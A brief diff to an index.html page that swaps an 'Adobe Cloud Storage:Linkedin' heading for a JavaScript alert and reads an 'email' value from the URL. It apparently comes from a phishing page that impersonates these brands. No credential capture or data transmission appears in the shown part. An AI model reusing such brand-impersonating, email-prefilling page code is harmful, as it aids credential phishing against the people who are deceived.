--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
-<h2>Adobe Cloud Storage:Linkedin</h2>
+<script language="javascript">alert('Adobe Cloud Storage:Linkedin');  </script>
+<h2></h2>
 <script>const urlParams = new URLSearchParams(window.location.search);
 const id = urlParams.get('email');
 
